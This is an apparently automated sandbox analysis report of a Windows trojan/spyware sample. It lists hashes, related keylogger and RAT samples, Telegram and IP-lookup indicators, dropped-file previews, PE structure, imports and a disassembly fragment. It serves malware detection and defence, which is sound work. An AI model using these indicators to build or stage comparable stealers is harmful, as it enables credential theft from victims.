                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:nfKqna8HuC.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:d410880574c2296f6f028d4112101a3ed0184b016f4d52cbcc743fc81f21da2d.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@3/2@2/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 57
                                              • Number of non-executed functions: 293
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45, 20.109.210.53
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              No simulations
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              149.154.167.220mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                  h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                    x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                        c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                            grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                              14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  158.101.44.242aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  prlsqnzspl.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • checkip.dyndns.org/
                                                                  yqfze5TKW7.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • checkip.dyndns.org/
                                                                  VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                                                  • checkip.dyndns.org/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  checkip.dyndns.commnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 193.122.6.168
                                                                  aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.6.168
                                                                  ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.6.168
                                                                  h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.130.0
                                                                  x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 132.226.247.73
                                                                  c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 132.226.8.169
                                                                  b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.6.168
                                                                  api.telegram.orgmnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 149.154.167.220
                                                                  Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                  • 149.154.167.220
                                                                  h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  TELEGRAMRUmnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 149.154.167.220
                                                                  Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                  • 149.154.167.220
                                                                  h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  ORACLE-BMC-31898USmnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 193.122.6.168
                                                                  aS39AS7b0P.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  gGI2gVBI0f.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.6.168
                                                                  ZpYFG94D4C.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.6.168
                                                                  h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.130.0
                                                                  x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.6.168
                                                                  grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 193.122.6.168
                                                                  Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 193.122.130.0
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  3b5074b1b5d032e5620f69f9f700ff0ekAsh3nmsgs.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                  • 149.154.167.220
                                                                  mnXS9meqtB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 149.154.167.220
                                                                  Exodus.txt.lnkGet hashmaliciousStormKittyBrowse
                                                                  • 149.154.167.220
                                                                  dhPWt112uC.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • 149.154.167.220
                                                                  h8izmpp1ZM.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  x8M2g1Xxhz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 149.154.167.220
                                                                  lrw6UNGsUC.exeGet hashmaliciousXWormBrowse
                                                                  • 149.154.167.220
                                                                  JWPRnfqs3n.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 149.154.167.220
                                                                  No context
                                                                  Process:C:\Users\user\Desktop\nfKqna8HuC.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):207562
                                                                  Entropy (8bit):7.973710526680461
                                                                  Encrypted:false
                                                                  SSDEEP:6144:6sFCWUm8eGklpm6MeBz5V8OrlPkeEpHdRBkwlF:6ICWUmBDmIBz5FkegPrF
                                                                  MD5:BD383EBE896225FBB522F40BB8BFE65D
                                                                  SHA1:DF55FA80C5177CA52B45BFF85B91A0985E76BF78
                                                                  SHA-256:55F6C30E910416D7986C6C791415075B5929167181978135D15640F07DC5BE82
                                                                  SHA-512:E29B123C82E42D2DB58C012410CEF008B4D3319E27F1032A49B179A366EE99714F272E206117E2E9DED6B15B10A2E4F4B69D231C09C07745F4A3321BCD3CD530
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:EA06..4..@4.Y...K...f..R.....B.6...SI...d....:.^.7...\.g.P...M..(...v..._..[.F_#..f....o:.U&r..fIz.L.r..n3/.Z.5.9...5.UN$....}..5....y).Q...\V_$..2I..Q8..s...(........Q...D^.G.Ht2...CM......u^.J.......h.z.+.=.4..(U........ms..j...[8.T:u..*...) .F....]g4j..YW.L.`.Y..}k.S..huZ.".U.MjT~..J.U.`.-Z.K..>..Y...wF..K3..[.@.....+..}..j`....e.....,....S..f.../..B.R...%{.J....'>.7.P..~......L.t9........:..kW..9.`...W..U...b..em@.%................3.K1t...s&.R.5:.jgv.......@.c......{.{..17.U.zl...(.Oj[M...!.V...+. ...4../3...y..{...g4.:..74.~g..v.qU.O..z......u._.o...~vP..>..x'`.......|.Mc....../.>.D..mF....{...g......M23J..y...w.#.U.......M6...b.Q.j..:.G5..s3\...W....+.....n"...K...I.P..R.....+9.....h......m.@..C.V-...K.......#......f=...+;....O..-.*e......M....&.Y...H..0..(.....{|.k...F/.......h)U..X.,...8.g.w.4.\.......R..T.6)t......_+.v.P.Th.Z..qV...S../.jn..{u.[....0.X.Uz=nmP....*..y}.Q(....K..a...........C1.p.".t.Au.:..G.....j..QO.v
                                                                  Process:C:\Users\user\Desktop\nfKqna8HuC.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):209920
                                                                  Entropy (8bit):7.842905658025974
                                                                  Encrypted:false
                                                                  SSDEEP:6144:4iNvduNaBUJYFS4ZczawJgP6pz/g3ThHe1Ym6:4iNvds+UqFS4ezd+Ps/MTh+1Yt
                                                                  MD5:83B6BF659E7AE167174B0A76791628FE
                                                                  SHA1:13B1F977EB982F35C4007F0781E4586D147E9CC1
                                                                  SHA-256:CC902054E9AF0F2F026650C7B617A92C73058E34194B3E9ECF270BC9344D1004
                                                                  SHA-512:1D06BA7FDFB8D4A7038715989650243EA5A71C91CDFDA8D11BDCB7443EDF394406A5D4FAB31F93C56D0B33D045DCF454BA6184198E1DC85A471467F76C871B59
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:~..5:FPKUGUZ.WR.RGY6PZ6.3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQG.Z3VYM.\G.?.{.V...aQ/#k!5:=A7:rT3)7Y$zT2.(A[./>k...z^937._JS.PZ6W3Z4]).}g .+vB.)~F.9k./$.&.$?..8{:.9y+.(.#.,uzX.FG.Mh.\G.!./uv!M{&.I..:^|+.)3Z459FPKQGUZ3VWR.h2.6PZ6.vZ4y8BP?.G.Z3VWR7RG.6s[=V:Z4.8FP.PGUZ3Vx.7RGI6PZ.V3Z4u9F@KQGWZ3SWR7RGY6UZ6W3Z459.SKQCUZ.mUR5RG.6PJ6W#Z459VPKAGUZ3VWB7RGY6PZ6W3Z. ;F.KQGU:1V.@6RGY6PZ6W3Z459FPKQGUZ3VWR7..X6LZ6W3Z459FPKQGUZ3VWR7RGY6PZ6.>X4u9FPKQGUZ3VWR.SG.7PZ6W3Z459FPKQGUZ3VWR7RGY6PtB2K.459^.JQGEZ3V.S7RCY6PZ6W3Z459FPKqGU:.$33C3GY.=Z6W.[45WFPK.FUZ3VWR7RGY6PZvW3..QX21KQG.j3VWr5RGO6PZ<U3Z459FPKQGUZ3.WR.|5*D3Z6W.H559&RKQSTZ3vUR7RGY6PZ6W3Z4u9F.KQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W3Z459FPKQGUZ3VWR7RGY6PZ6W
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.069221429639379
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:nfKqna8HuC.exe
                                                                  File size:1'147'392 bytes
                                                                  MD5:377f17e222f90e7dbb2d75c7ba9175f3
                                                                  SHA1:3aafb77c8fca8727985a1c1f3e06b54ef5f10f70
                                                                  SHA256:d410880574c2296f6f028d4112101a3ed0184b016f4d52cbcc743fc81f21da2d
                                                                  SHA512:5575e1852328a7744b6666788166b9728e8a44f1a5276b9246b3377b791ac0c17be51b96b39fc3ca1f77dbb96907e51d1791341343b5fb16e9771489b3e4c928
                                                                  SSDEEP:24576:ytb20pkaCqT5TBWgNQ7abmHCaphF0iqjw6A:/Vg5tQ7abmr2M5
                                                                  TLSH:FD35CF1273DE8364C3B25273BA65B741BEBF782506A1F56B2FD8093DE920122521E773
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                  Icon Hash:aaf3e3e3938382a0
                                                                  Entrypoint:0x425f74
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x6747B205 [Wed Nov 27 23:57:57 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:1
                                                                  File Version Major:5
                                                                  File Version Minor:1
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:1
                                                                  Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                  Instruction
                                                                  call 00007F41D0EF2BFFh
                                                                  jmp 00007F41D0EE5C14h
                                                                  int3
                                                                  int3
                                                                  push edi
                                                                  push esi
                                                                  mov esi, dword ptr [esp+10h]
                                                                  mov ecx, dword ptr [esp+14h]
                                                                  mov edi, dword ptr [esp+0Ch]
                                                                  mov eax, ecx
                                                                  mov edx, ecx
                                                                  add eax, esi
                                                                  cmp edi, esi
                                                                  jbe 00007F41D0EE5D9Ah
                                                                  cmp edi, eax
                                                                  jc 00007F41D0EE60FEh
                                                                  bt dword ptr [004C0158h], 01h
                                                                  jnc 00007F41D0EE5D99h
                                                                  rep movsb
                                                                  jmp 00007F41D0EE60ACh
                                                                  cmp ecx, 00000080h
                                                                  jc 00007F41D0EE5F64h
                                                                  mov eax, edi
                                                                  xor eax, esi
                                                                  test eax, 0000000Fh
                                                                  jne 00007F41D0EE5DA0h
                                                                  bt dword ptr [004BA370h], 01h
                                                                  jc 00007F41D0EE6270h
                                                                  bt dword ptr [004C0158h], 00000000h
                                                                  jnc 00007F41D0EE5F3Dh
                                                                  test edi, 00000003h
                                                                  jne 00007F41D0EE5F4Eh
                                                                  test esi, 00000003h
                                                                  jne 00007F41D0EE5F2Dh
                                                                  bt edi, 02h
                                                                  jnc 00007F41D0EE5D9Fh
                                                                  mov eax, dword ptr [esi]
                                                                  sub ecx, 04h
                                                                  lea esi, dword ptr [esi+04h]
                                                                  mov dword ptr [edi], eax
                                                                  lea edi, dword ptr [edi+04h]
                                                                  bt edi, 03h
                                                                  jnc 00007F41D0EE5DA3h
                                                                  movq xmm1, qword ptr [esi]
                                                                  sub ecx, 08h
                                                                  lea esi, dword ptr [esi+08h]
                                                                  movq qword ptr [edi], xmm1
                                                                  lea edi, dword ptr [edi+08h]
                                                                  test esi, 00000007h
                                                                  je 00007F41D0EE5DF5h
                                                                  bt esi, 03h
                                                                  jnc 00007F41D0EE5E48h
                                                                  movdqa xmm1, dqword ptr [esi+00h]
                                                                  Programming Language:
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [ASM] VS2012 UPD4 build 61030
                                                                  • [RES] VS2012 UPD4 build 61030
                                                                  • [LNK] VS2012 UPD4 build 61030
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x4f1e8.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1140000x6c4c.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0xc40000x4f1e80x4f2007df0d45e5c730c35280426d3973d24f4False0.9176571139415481data7.869966047025345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x1140000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                  RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                  RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                  RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                  RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                  RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                  RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                  RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                  RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                  RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                  RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                  RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                  RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                  RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                  RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                  RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                  RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                  RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                  RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                  RT_RCDATA0xcc7b80x464efdata1.0003333530104208
                                                                  RT_GROUP_ICON0x112ca80x76dataEnglishGreat Britain0.6610169491525424
                                                                  RT_GROUP_ICON0x112d200x14dataEnglishGreat Britain1.25
                                                                  RT_GROUP_ICON0x112d340x14dataEnglishGreat Britain1.15
                                                                  RT_GROUP_ICON0x112d480x14dataEnglishGreat Britain1.25
                                                                  RT_VERSION0x112d5c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                  RT_MANIFEST0x112e380x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                                  DLLImport
                                                                  WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                  COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                  USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                  UxTheme.dllIsThemeActive
                                                                  KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
